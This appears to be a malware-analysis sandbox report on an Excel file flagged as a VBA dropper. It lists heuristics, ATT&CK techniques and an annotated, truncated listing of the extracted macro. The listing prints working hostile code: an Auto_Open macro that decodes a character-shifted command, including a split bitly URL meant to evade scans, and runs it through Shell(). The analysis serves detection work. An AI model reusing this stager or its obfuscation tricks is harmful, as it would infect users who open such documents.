MALICIOUS
280
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The file is an Excel document containing VBA macros, with a critical heuristic firing for an Auto_Open macro that uses the Shell() function. The command string passed to Shell() is further obfuscated with character-shift decoding, indicating an attempt to hide what is executed. The ClamAV detection name 'Doc.Dropper.Agent-6910166-0' strongly suggests this macro is designed to drop and execute a secondary payload.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6910166-0 — critical — CLAMAV_DETECTION — ClamAV detected this file as malware: Doc.Dropper.Agent-6910166-0
-
VBA macros detected — medium — 4 related findings — OLE_VBA_MACROS — Document contains VBA macro code
-
Shell() call in VBA — critical — OLE_VBA_SHELL — Shell() call in VBA
-
VBA character-shift decoded Shell command — critical — OLE_VBA_ASC_CHR_SHIFT_SHELL — VBA auto-exec macro stores an encoded command string, decodes it with a Mid/Asc/Chr character-shift loop, and passes the recovered text to Shell. This is a high-confidence command stager.
-
Auto_Open macro — high — OLE_VBA_AUTO — Auto_Open macro
-
VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC — Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where the visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17710 bytes |

SHA-256 (macros.bas): d5170aa61658ed3d2670d7fed068054ae2ed09f3f5527fc0aeeca6401716f39a
Preview script — first 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
' Module1 holds only this procedure. It has no statements and therefore
' no effect; why it exists is not determinable from the visible source.
Sub jhjgfdghj()
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module2"
' Auto_Open is an Excel auto-exec procedure name: it runs when the
' workbook is opened with macros enabled, without any further user
' action (heuristic OLE_VBA_AUTO).
Sub Auto_Open()
' Seven string fragments (l_Sp0 .. l_Sp6) are prepared and concatenated
' below. Three are plain literals; the other four come from DS4737L2A,
' whose visible loop rewrites each character of its first argument as
' Chr(Asc(ch) - n), i.e. a per-character shift by its integer argument.
' The helpers Zq5rj2dk0 / llPGXwNvy / jAzu7h4Aj that feed it are not in
' the visible source, so the decoded fragments cannot be recovered from
' this listing alone. StrReverse(StrReverse(x)) is an identity and
' serves only to pad the expression.
l_Sp6 = "Mean7777"
l_Sp2 = DS4737L2A(StrReverse(Zq5rj2dk0(llPGXwNvy(jAzu7h4Aj("# ", "zFBntnHxQ")))), StrReverse(StrReverse(Zq5rj2dk0(Zq5rj2dk0(llPGXwNvy(jAzu7h4Aj(" n", "ztaktS6li")))))))
l_Sp0 = DS4737L2A(StrReverse(Zq5rj2dk0(llPGXwNvy(jAzu7h4Aj(" k", "rZL3XX5Gy")))), StrReverse(StrReverse(Zq5rj2dk0(Zq5rj2dk0(llPGXwNvy(jAzu7h4Aj(" n", "ztaktS6li")))))))
l_Sp4 = "a h"
l_Sp1 = DS4737L2A(StrReverse(StrReverse(Zq5rj2dk0(Zq5rj2dk0(llPGXwNvy(jAzu7h4Aj("÷¹", "rWdbNCEIZ")))))), StrReverse(Zq5rj2dk0(llPGXwNvy(jAzu7h4Aj("Cè", "N02c9n5JE")))))
' Literal URL fragment; the preceding "h" is supplied by the previous
' fragment ("a h"), so neither piece matches a plain "http://" scan.
l_Sp5 = "ttp://www.bitly.com/"
l_Sp3 = DS4737L2A(StrReverse(StrReverse(Zq5rj2dk0(Zq5rj2dk0(llPGXwNvy(jAzu7h4Aj("÷¹", "rWdbNCEIZ")))))), StrReverse(Zq5rj2dk0(llPGXwNvy(jAzu7h4Aj("k›", "tyoYoi3BV")))))
' Assembly order follows the numeric suffix (0..6), not the order in
' which the fragments were assigned above.
l_Sp = l_Sp0 + l_Sp1 + l_Sp2 + l_Sp3 + l_Sp4 + l_Sp5 + l_Sp6
' The assembled string is handed to the OS (OLE_VBA_SHELL). For
' detection, the observable is the Office host process spawning a
' child process directly from an auto-exec macro; blocking or
' stripping macros at the mail/web gateway prevents this path entirely.
Shell (l_Sp)
End Sub
Public Function DS4737L2A(w1qbbJ7Oq As String, jQUuRcNnU As Integer)
Dim x2pFv756Z As Integer
For x2pFv756Z = 1 To Len(w1qbbJ7Oq)
If 343582335 = 343582335 + 1 Then End
Dim uPrvKHpDccEMZBUAYp As Date
GoTo gEceLRkshOJJINwFMc
gEceLRkshOJJINwFMc:
GoTo sEhAgDViVTNgzjuzwHZavw:
ikcBeItpdyftDmmZLmIVkQiZymkewtPmKQMYbqLMQg:
GoTo ETnHaUJqyzCnhoRfeuyBsRhaJtOrvJToCpcCZY
uzwHZavwFeKokqJRHnijhmQPYBdNikcBeItpdy:
RSQVGNUlLLcRTLlNsqYM = "YOcVUII"
GoTo eKoDkqJRHnijhmQPBdNeikcBeItpdyoftDmmLmIVkQiUZymkewtPmKQM
AgDViVTNgdzuzwHZavwFeKokqJRHnijhmQPYBdN:
Mid(w1qbbJ7Oq, x2pFv756Z, 1) = Chr(Asc(Mid(w1qbbJ7Oq, x2pFv756Z, 1)) - jQUuRcNnU)
GoTo ikcBeItpdyftDmmZLmIVkQiZymkewtPmKQMYbqLMQg
ETnHaUJqyzCnhoRfeuyBsRhaJtOrvJToCpcCZY:
kQiUZymkewtPmKQMYbqL = "QgbETnHaJqyzxCnhoR"
GoTo izlpOpAuMJgCbSOsGcPZwrUQD
bqLMQgbETnHaUJqyzxCnoRfeuyBsRhartOrvJToCpcCZYAiz:
QkPnFfFQKdMjSejg = "IQfgpHlnTatBr"
GoTo pOpAuMJgCbSOsGcPZwrUQD
MjSejgrIQfpNHlnTatBrQSQVGNUlLLcRTLlNsqYMYOcnVUIIksE:
kQiUZymkewtPmKQMYbqL = "QgbETnHaJqyzxCnhoR"
GoTo AgDViVTNgdzuzwHZavwFeKokqJRHnijhmQPYBdN
sEhAgDViVTNgzjuzwHZavw:
RSQVGNUlLLcRTLlNsqYM = "YOcVUII"
GoTo bqLMQgbETnHaUJqyzxCnoRfeuyBsRhartOrvJToCpcCZYAiz
dlbGPPNSqxEjvvKORJixaHKfHLaVFSssToQkPnFfFQKMjSejgrIQf:
ObsGcPZwrUQDYdlbGPPN = "qxEjvvKORixqaHKfHaVFSssTc"
GoTo pNHlnTatBrQSQVGNUlLLcRTLlNsqYMYOcnVUIIksEAgDViVTNgdz
pNHlnTatBrQSQVGNUlLLcRTLlNsqYMYOcnVUIIksEAgDViVTNgdz:
QkPnFfFQKdMjSejg = "IQfgpHlnTatBr"
GoTo uzwHZavwFeKokqJRHnijhmQPYBdNikcBeItpdy
dlbGPPNSqxEjvvKORJixaHKfHLaVFSssToQkPnFfFQK:
euyBsRhaJrtOrvJ = "oCpcCZYAizpOpuMJgCb"
GoTo MjSejgrIQfpNHlnTatBrQSQVGNUlLLcRTLlNsqYMYOcnVUIIksE
izlpOpAuMJgCbSOsGcPZwrUQD:
euyBsRhaJrtOrvJ = "oCpcCZYAizpOpuMJgCb"
GoTo dlbGPPNSqxEjvvKORJixaHKfHLaVFSssToQkPnFfFQKMjSejgrIQf
pOpAuMJgCbSOsGcPZwrUQD:
ObsGcPZwrUQDYdlbGPPN = "qxEjvvKORixqaHKfHaVFSssTc"
GoTo dlbGPPNSqxEjvvKORJixaHKfHLaVFSssToQkPnFfFQK
eKoDkqJRHnijhmQPBdNeikcBeItpdyoftDmmLmIVkQiUZymkewtPmKQ
... (truncated)
|
|||